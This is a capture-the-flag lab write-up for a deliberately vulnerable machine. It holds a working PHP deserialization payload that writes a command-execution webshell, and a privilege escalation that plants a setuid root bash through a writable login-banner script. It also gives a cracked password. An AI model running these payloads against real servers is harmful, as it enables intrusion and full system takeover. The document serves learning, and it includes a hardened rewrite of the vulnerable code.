Port scanning

nmap --min-rate=10000 -p- debug.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-27 11:24 UTC
Nmap scan report for debug.thm (10.10.2.3)
Host is up (0.0060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:39:10:22:A6:7F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.45 seconds
nmap -sC -sT -sV -O -p22,80 debug.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-27 11:25 UTC
Nmap scan report for debug.thm (10.10.2.3)
Host is up (0.00040s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 44ee1eba072a5469ff11e349d7dba901 (RSA)
| 256 8b2a8fd8409533d5fa7a406a7f29e403 (ECDSA)
|_ 256 6559e4402ac2d70577b3af60dacdfc67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:39:10:22:A6:7F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (99%), Linux 3.8 (96%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Linux 3.10 (92%), Linux 3.12 (92%), Linux 3.19 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.42 seconds

Getshell

Visiting port 80 shows the Apache default page, so scan for directories:

feroxbuster -u http://debug.thm/  -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,zip,txt,sql,bak,db,rar  

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.2
───────────────────────────┬──────────────────────
🎯 Target Url │ http://debug.thm/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.2
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, zip, txt, sql, bak, db, rar]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 15l 74w 6143c http://debug.thm/icons/ubuntu-logo.png
200 GET 375l 968w 11321c http://debug.thm/
200 GET 31l 109w 4091c http://debug.thm/javascripts/default.js
200 GET 574l 1271w 10371c http://debug.thm/style.css
200 GET 204l 469w 5732c http://debug.thm/index.php
301 GET 9l 28w 311c http://debug.thm/javascript => http://debug.thm/javascript/
200 GET 2l 20w 94c http://debug.thm/message.txt
301 GET 9l 28w 307c http://debug.thm/backup => http://debug.thm/backup/
200 GET 574l 1271w 10371c http://debug.thm/backup/style.css
200 GET 375l 968w 11321c http://debug.thm/backup/index.html.bak
200 GET 239l 563w 6399c http://debug.thm/backup/index.php.bak
200 GET 42l 374w 2339c http://debug.thm/backup/readme.md
200 GET 31l 109w 4091c http://debug.thm/backup/javascripts/default.js
200 GET 31l 80w 1112c http://debug.thm/backup/less/mixins.less
200 GET 585l 1455w 12659c http://debug.thm/backup/less/style.less
200 GET 3404l 5575w 2221967c http://debug.thm/backup/grid/base-grid.psd
301 GET 9l 28w 305c http://debug.thm/grid => http://debug.thm/grid/
200 GET 3404l 5575w 2221967c http://debug.thm/grid/base-grid.psd
301 GET 9l 28w 305c http://debug.thm/less => http://debug.thm/less/
200 GET 585l 1455w 12659c http://debug.thm/less/style.less
200 GET 31l 80w 1112c http://debug.thm/less/mixins.less
301 GET 9l 28w 312c http://debug.thm/javascripts => http://debug.thm/javascripts/
[#####>--------------] - 18m 961218/3528992 36m found:22 errors:217
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_debug_thm_-1711540027.state ...
[#####>--------------] - 18m 961253/3528992 36m found:22 errors:217
[#####>--------------] - 18m 517088/1764368 475/s http://debug.thm/
[####################] - 0s 1764368/1764368 441092000/s http://debug.thm/javascripts/ => Directory listing
[#####>--------------] - 18m 444424/1764368 409/s http://debug.thm/javascript/
[####################] - 0s 1764368/1764368 11310051/s http://debug.thm/backup/ => Directory listing
[####################] - 0s 1764368/1764368 26732848/s http://debug.thm/backup/less/ => Directory listing
[####################] - 0s 1764368/1764368 35287360/s http://debug.thm/backup/javascripts/ => Directory listing
[####################] - 0s 1764368/1764368 3600751/s http://debug.thm/backup/grid/ => Directory listing
[####################] - 1s 1764368/1764368 3042014/s http://debug.thm/grid/ => Directory listing
[####################] - 0s 1764368/1764368 20280092/s http://debug.thm/less/ => Directory listing
[--------------------] - 0s 0/1764368 - http://debug.thm/icons/ubuntu-logo.png

There is a /backup directory, and inside it a backup of the index.php source:

<?php

class FormSubmit {

    public $form_file = 'message.txt';
    public $message = '';

    public function SaveMessage() {

        $NameArea = $_GET['name'];
        $EmailArea = $_GET['email'];
        $TextArea = $_GET['comments'];

        $this->message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";

    }

    // Runs when any FormSubmit object is destroyed, including one produced by unserialize() below.
    public function __destruct() {

        file_put_contents(__DIR__ . '/' . $this->form_file, $this->message, FILE_APPEND);
        echo 'Your submission has been successfully saved!';

    }

}

// Leaving this for now... only for debug purposes... do not touch!

// $debug comes straight from the request and is passed to unserialize() unchecked.
$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application->SaveMessage();

?>

There is a FormSubmit class, and a debug backdoor has been left in: whatever we pass in the debug parameter is unserialized. The __destruct magic method fires when the unserialized object is destroyed at the end of the script; it uses the form_file member as the filename and appends the message member's content to that file, in the same directory as index.php.

So we can construct a FormSubmit object that writes a one-line webshell:

<?php

class FormSubmit {
    public $form_file = 'shell.php';
    public $message = '<?php system($_GET["shell"]);';
}

// Create an instance of the FormSubmit class
$formSubmit = new FormSubmit();

// Serialize the object
$serializedObject = serialize($formSubmit);

// Print the serialized object
echo $serializedObject;

?>

Output, which is passed as the debug parameter:

O:10:"FormSubmit":2:{s:9:"form_file";s:9:"shell.php";s:7:"message";s:29:"<?php system($_GET["shell"]);";}
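A hardened rewrite of the backed-up index.php, added here as an example and not the room's own code. It assumes a data/ directory one level above the web root for the message log; everything else follows the original handler's behaviour.

```php
<?php
// Added example (not the room's code): a hardened rewrite of the FormSubmit handler.
// Changes: no unserialize() on user input, a constant output filename stored outside
// the web root, an explicit write instead of side effects in __destruct, and a debug
// parameter (if it must stay) decoded as plain JSON data with no object instantiation.

final class FormSubmit
{
    // Fixed destination; never taken from request data, and never a .php file.
    private const FORM_FILE = 'message.txt';
    private string $message = '';

    public function saveMessage(array $get): void
    {
        // Require the fields and bound their length so the log cannot be filled at will.
        $name    = substr(trim((string)($get['name'] ?? '')), 0, 100);
        $email   = substr(trim((string)($get['email'] ?? '')), 0, 254);
        $comment = substr(trim((string)($get['comments'] ?? '')), 0, 2000);
        if ($name === '' || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
            throw new InvalidArgumentException('name and a valid email are required');
        }
        // Strip CR/LF so one submission cannot forge extra records in the log.
        $clean = static fn(string $s): string => str_replace(["\r", "\n"], ' ', $s);
        $this->message = 'Message From : ' . $clean($name)
            . ' || From Email : ' . $clean($email)
            . ' || Comment : ' . $clean($comment) . "\n";
    }

    // Explicit write; nothing happens implicitly in a destructor.
    public function flush(): void
    {
        // Assumed layout: a data/ directory one level above the document root.
        $path = dirname(__DIR__) . '/data/' . self::FORM_FILE;
        if (file_put_contents($path, $this->message, FILE_APPEND | LOCK_EX) === false) {
            throw new RuntimeException('could not write message log');
        }
    }
}

// If a debug view of structured input is still wanted, decode it as data only:
// json_decode() never instantiates classes, so no magic method can fire.
// unserialize($debug, ['allowed_classes' => false]) would also block object
// creation, but JSON is the simpler choice when no objects are needed.
$debug = $_GET['debug'] ?? '';
$messageDebug = $debug !== '' ? json_decode($debug, true, 8, JSON_THROW_ON_ERROR) : null;
$application = new FormSubmit();
$application->saveMessage($_GET);
$application->flush();
echo 'Your submission has been successfully saved!';
```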

Privilege escalation

Next, get a reverse shell. The machine does not seem to have nc, so upload a PHP reverse shell instead and spawn a pty with python.

In /var/www/html there is a .htpasswd file containing the password hash of the user james; cracking it gives the password jamaica.

In the home directory there is a note from root: james is allowed to change the SSH welcome banner, so we may be able to get command execution through it.

Look for files under /etc/ that the current user can write:

find /etc/ -type f -writable 2>/dev/null

This finds:

./update-motd.d/10-help-text
./update-motd.d/91-release-upgrade
./update-motd.d/98-fsck-at-reboot
./update-motd.d/98-reboot-required
./update-motd.d/00-header
./update-motd.d/00-header.save
./update-motd.d/99-esm
./update-motd.d/90-updates-available

update-motd.d is the mechanism that builds the system information shown at login. We edit /etc/update-motd.d/00-header, the script that prints the header at the start of an SSH session.

Append:

cp /bin/bash /tmp/root_bash;chmod +xs /tmp/root_bash

Save, exit, and reconnect over SSH, then run:

/tmp/root_bash -p

Now we are root!

Closing thoughts

I deliberately picked a PHP deserialization room, since I had not touched PHP deserialization in a long time; before this I had only done some CTF web challenges. The exploitation in this room is fairly simple, and so is the privilege escalation: you only need a basic understanding of how motd works on Linux.